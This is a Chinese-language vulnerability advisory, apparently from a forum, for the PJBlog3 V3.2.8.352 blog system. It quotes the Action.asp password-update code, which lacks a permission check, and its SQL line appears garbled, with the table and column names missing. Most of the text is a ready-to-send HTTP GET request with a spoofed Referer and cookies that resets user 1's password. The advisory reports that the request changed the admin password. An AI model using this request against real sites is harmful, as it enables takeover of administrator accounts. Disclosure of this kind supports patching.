PJBlog3 V3.2.8.352文件Action.asp修改任意用户密码
发布日期:2011-06.19 <br />发布作者:佚名 <br /><br />影响版本:PJBlog3 V3.2.8.352 <br /><br />漏洞类型:设计错误 <br />漏洞描述:PJBlog一套开源免费的中文个人博客系统程序,采用asp+Access的技术,具有相当高的运作效能以及更新率,也支持目前Blog所使用的新技术 <br /><br />在文件Action.asp中: <br /><br><div class="msgheader"><div class="right"><span style="CURSOR: pointer" class="copybut"><u>复制代码</u></span></div>代码如下:</div><div class="msgborder" id="phpcode10"> <br />ElseIf Request.QueryString("action") = "updatepassto" Then //第307行 <br />If ChkPost() Then <br />Dim e_Pass, e_RePass, e_ID, e_Rs, e_hash, d_pass <br />e_ID = CheckStr(UnEscape(Request.QueryString("id"))) <br />e_Pass = CheckStr(UnEscape(Request.QueryString("pass"))) <br />e_RePass = CheckStr(UnEscape(Request.QueryString("repass"))) <br />Set e_Rs = Server.CreateObject("Adodb.Recordset") <br />e_Rs.open "Select * From Where ="&e_ID, Conn, 1, 3 <br />e_hash = e_Rs("mem_salt") <br />d_pass = SHA1(e_Pass&e_hash) <br />e_Rs("mem_Password") = d_pass <br />e_Rs.update <br />e_Rs.Close <br />Set e_Rs = nothing <br />response.Write("1") <br />Else <br />response.write lang.Err.info(999) <br />End If <br /></div><br />程序在修改用户的密码时,没有对用户的合法权限做验证,导致攻击者可以修改任意用户的密码。 <font color="#ff0000">应该先判断用户权限</font><br /><br />测试方法: <br /><br><div class="msgheader"><div class="right"><span style="CURSOR: pointer" class="copybut"><u>复制代码</u></span></div>代码如下:</div><div class="msgborder" id="phpcode11"> <br />//需修改Referer值通过程序检测 <br />GET /action.asp?action=updatepassto&id=1&pass=123456&repass=test HTTP/1.1 <br />Accept: application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* <br />Referer: http://127.0.0.1/test.htm <br />Accept-Language: zh-cn <br />UA-CPU: x86 <br />Accept-Encoding: gzip, deflate <br />User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler 4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727) <br />Host: 127.0.0.1 <br />Connection: Keep-Alive <br />Cookie: PJBlog3Setting=ViewType=normal; PJBlog3=memRight=000000110000&memHashKey=&memName=&DisValidate=False&memLastpost=2009%2D11%2D08+11%3A18%3A27&exp=2010%2D11%2D8&Guest=%7Brecord%3Atrue%2Cusername%3A%27test%27%2Cuseremail%3A%27ww%40126%2Ecom%27%2Cuserwebsite%3A%27http%3A%2F%2Fwww%2Ebaidu%2Ecom%2Findex%3F%26lt%3Bfff%26gt%3B%27%7D; ASPSESSIONIDASDSSADD=DAMNKLBDKADFCKOGKEJOKJPP; ASPSESSIONIDCQCQTBCD=MOJFLCCDBICHALBBGGMMENML <br /></div><br />(测试结果:成功修改管理密码)
頁:
[1]